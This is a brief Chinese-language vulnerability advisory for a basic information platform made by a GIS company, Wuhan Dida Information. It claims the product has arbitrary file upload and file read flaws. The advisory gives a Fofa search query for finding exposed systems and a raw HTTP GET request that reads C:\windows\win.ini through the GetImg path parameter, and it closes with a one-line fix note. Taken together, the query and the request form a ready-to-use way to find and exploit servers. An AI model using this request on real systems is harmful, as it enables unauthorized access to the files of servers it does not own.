0x01 漏洞描述:
武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。
旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。
0x02 搜索语句:
Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"
0x03 漏洞复现:
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
0x04 修复建议:
厂商已发布补丁 请及时修复